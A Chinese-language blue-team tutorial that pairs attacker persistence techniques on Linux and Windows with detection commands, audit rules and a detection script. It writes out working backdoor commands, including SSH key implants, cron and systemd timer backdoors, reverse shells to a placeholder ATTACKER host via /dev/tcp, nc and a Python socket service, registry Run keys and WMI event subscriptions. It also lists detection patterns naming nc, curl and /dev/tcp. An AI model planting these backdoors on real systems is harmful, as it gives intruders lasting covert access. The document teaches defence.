攻击者如何留下后门,蓝队如何发现
持久化(Persistence)是攻击者在系统上维持访问的技术。即使初始入口被修复,后门机制仍能让攻击者重新进入。MITRE ATT&CK将持久化列为战术TA0003,包含超过50种技术。
# 攻击者植入SSH公钥
echo "ssh-rsa AAAA... attacker@evil" >> /root/.ssh/authorized_keys
echo "ssh-rsa AAAA... attacker@evil" >> /home/user/.ssh/authorized_keys
# 检测方法
# 检查所有用户的authorized_keys
find / -name "authorized_keys" -type f 2>/dev/null | while read f; do
echo "=== $f ==="
cat "$f"
# 检查修改时间
stat "$f" | grep Modify
done
# 检查异常的SSH配置
grep -v "^#" /etc/ssh/sshd_config | grep -i "PermitRootLogin\|PasswordAuth"
# PermitRootLogin yes ← 危险
# PasswordAuthentication yes ← 危险
# 攻击者添加定时任务
# /etc/crontab
* * * * * root /tmp/.hidden/backdoor.sh
# 用户crontab
(crontab -l 2>/dev/null; echo "*/5 * * * * /tmp/.backdoor") | crontab -
# systemd timer (更隐蔽)
cat > /etc/systemd/system/legitimate.service << 'EOF'
[Unit]
Description=System Update Service
[Service]
Type=oneshot
ExecStart=/tmp/.hidden/backdoor.sh
EOF
cat > /etc/systemd/system/legitimate.timer << 'EOF'
[Unit]
Description=System Update Timer
[Timer]
OnCalendar=*:0/5
[Install]
WantedBy=timers.target
EOF
systemctl enable legitimate.timer
# 检测方法
crontab -l
cat /etc/crontab
ls -la /etc/cron.*/
systemctl list-timers --all
find /etc/systemd/system -name "*.timer" -newer /etc/hostname
# PAM (Pluggable Authentication Modules) 后门
# 修改/etc/pam.d/common-auth或sshd
# 添加恶意PAM模块
# 攻击者可能替换pam_unix.so
# 在认证时记录密码或添加万能密码
# 检测方法
# 检查PAM模块完整性
find /lib/x86_64-linux-gnu/security/ -name "pam_*.so" | while read f; do
md5sum "$f"
done
# 与已知良好hash对比
# 检查PAM配置修改
find /etc/pam.d/ -type f | while read f; do
echo "=== $f ==="
grep -v "^#\|^$" "$f"
done
# 检查异常PAM模块
grep -r "pam_" /etc/pam.d/ | grep -v "pam_unix\|pam_deny\|pam_permit\|pam_env\|pam_cred"
# 在.bashrc/.zshrc中植入后门
echo 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1 &' >> /root/.bashrc
echo '(/tmp/.backdoor &)' >> /home/user/.bashrc
# 在/etc/profile.d/植入
echo 'id | nc ATTACKER 4444 &' > /etc/profile.d/lookup.sh
# 检测方法
find / -name ".bashrc" -o -name ".zshrc" -o -name ".profile" 2>/dev/null | while read f; do
echo "=== $f ==="
grep -E "(nc |curl |wget |/dev/tcp|base64 -d|eval )" "$f"
done
ls -la /etc/profile.d/
find /etc/profile.d/ -newer /etc/hostname
# 恶意systemd服务
cat > /etc/systemd/system/dbus-backdoor.service << 'EOF'
[Unit]
Description=D-Bus System Service
After=network.target
[Service]
Type=simple
Restart=always
RestartSec=5
ExecStart=/usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable dbus-backdoor
# 检测方法
systemctl list-unit-files --state=enabled
# 检查异常服务
systemctl list-units --type=service --state=running | grep -v "systemd\|ssh\|cron\|rsyslog\|networking"
# 检查服务文件修改时间
find /etc/systemd/system -name "*.service" -newer /etc/hostname
# 最常见的Windows持久化
# 注册表自启动位置:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\backdoor.exe"
# 其他自启动位置:
# HKLM\...\RunOnce
# HKCU\...\RunOnce
# HKLM\...\RunServices
# HKCU\...\RunServicesOnce
# 检测 (PowerShell)
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Get-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
# Autoruns (Sysinternals)
autoruns.exe -a -ct # 检查所有自启动项
# 创建计划任务后门
schtasks /create /tn "WindowsUpdate" /tr "C:\backdoor.exe" /sc onstart /ru SYSTEM
schtasks /create /tn "SystemService" /tr "powershell -ep bypass -f C:\backdoor.ps1" /sc minute /mo 5
# 检测
schtasks /query /fo LIST /v | findstr /i "backdoor\|reverse\|shell\|update"
Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "\Microsoft\*"}
# WMI事件订阅 (非常隐蔽!)
# 1. 事件过滤器 (触发条件)
$filter = Set-WmiInstance -Class __EventFilter -Arguments @{
Name = "BackdoorFilter"
EventNameSpace = "root\cimv2"
QueryLanguage = "WQL"
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}
# 2. 事件消费者 (执行动作)
$consumer = Set-WmiInstance -Class CommandLineEventConsumer -Arguments @{
Name = "BackdoorConsumer"
CommandLineTemplate = "cmd.exe /c C:\backdoor.exe"
}
# 3. 绑定
Set-WmiInstance -Class __FilterToConsumerBinding -Arguments @{
Filter = $filter
Consumer = $consumer
}
# 检测WMI持久化
Get-WMIObject -Class __FilterToConsumerBinding -Namespace root\subscription
Get-WMIObject -Class __EventFilter -Namespace root\subscription
Get-WMIObject -Class CommandLineEventConsumer -Namespace root\subscription
| 工具 | 平台 | 检测范围 |
|---|---|---|
| Autoruns | Windows | 注册表、服务、驱动、计划任务 |
| OSSEC/Wazuh | 跨平台 | 文件完整性、rootkit检测 |
| AIDE | Linux | 文件完整性监控 |
| Sigma | 跨平台 | 日志规则匹配 |
| Velociraptor | 跨平台 | 端点响应与收集 |
| auditd | Linux | 系统调用审计 |
# Linux持久化检测脚本
#!/bin/bash
# persistence-detect.sh
echo "=== SSH密钥检查 ==="
find / -name "authorized_keys" 2>/dev/null | while read f; do
lines=$(wc -l < "$f")
mod=$(stat -c %Y "$f")
echo "$f: $lines keys, modified $(date -d @$mod)"
done
echo -e "\n=== 可疑Cron任务 ==="
cat /etc/crontab 2>/dev/null | grep -v "^#\|^$"
for user in $(cut -d: -f1 /etc/passwd); do
crontab -u "$user" -l 2>/dev/null | grep -q "." && \
echo "User $user has crontab"
done
echo -e "\n=== Systemd服务检查 ==="
systemctl list-unit-files --state=enabled | grep -v "systemd\|ssh\|cron\|rsyslog\|networking\|ufw\|apparmor\|snapd"
echo -e "\n=== 最近修改的系统文件 ==="
find /etc /usr/local/bin /opt -type f -mtime -7 2>/dev/null
echo -e "\n=== PAM模块检查 ==="
find /lib/x86_64-linux-gnu/security/ -name "pam_*.so" -mtime -30 2>/dev/null
echo -e "\n=== 隐藏文件检查 ==="
find /tmp /var/tmp /dev/shm -name ".*" -type f 2>/dev/null
echo -e "\n=== 异常进程 ==="
ps aux | grep -E "(nc |ncat |socat |/dev/tcp|python.*socket|perl.*socket)"
echo -e "\n=== 异常网络连接 ==="
ss -tnp | grep -v "127.0.0.1\|::1"
# 1. 文件完整性监控 (FIM)
# AIDE配置
cat > /etc/aide/aide.conf << 'EOF'
/etc p+i+n+u+g+s+m+sha512
/root p+i+n+u+g+s+m+sha512
/home p+i+n+u+g+s+m+sha512
/usr/bin p+i+n+u+g+s+m+sha512
/usr/sbin p+i+n+u+g+s+m+sha512
/lib p+i+n+u+g+s+m+sha512
EOF
aideinit
aide --check
# 2. 审计关键文件
auditctl -w /etc/ssh/sshd_config -p wa -k ssh_config
auditctl -w /root/.ssh/ -p wa -k ssh_keys
auditctl -w /etc/cron* -p wa -k cron
auditctl -w /etc/systemd/system/ -p wa -k systemd
auditctl -w /etc/pam.d/ -p wa -k pam
# 3. 端点检测与响应 (EDR)
# Wazuh配置
# /var/ossec/etc/ossec.conf
/etc
/root
/usr/local/bin
3600
/var/ossec/etc/shared/rootkit_files.txt
/var/ossec/etc/shared/rootkit_trojans.txt
# 4. 不可变文件属性
chattr +i /etc/ssh/sshd_config # 防止修改
lsattr /etc/ssh/sshd_config # 检查属性